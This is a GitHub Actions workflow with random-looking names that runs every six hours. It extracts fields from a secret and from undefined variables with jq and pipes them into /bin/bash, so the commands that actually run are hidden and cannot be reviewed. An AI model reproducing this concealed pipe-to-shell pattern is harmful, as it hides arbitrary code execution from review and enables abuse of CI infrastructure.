name: xiongtianping4187
on:
  workflow_dispatch:
  schedule:
    - cron: '24 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiongtianping4187
        env:
          tn889: ${{ secrets.tn889 }}
        run: |
          echo $tn889 | jq -r .aiby0106 | /bin/bash
          echo $i05606 | jq -r .bbi9 | /bin/bash
          echo $yw34327 | jq -r .er2055 | /bin/bash
          echo $eci889 | jq -r .dwod6 | /bin/bash
          echo $oc604 | jq -r .ach32601 | /bin/bash

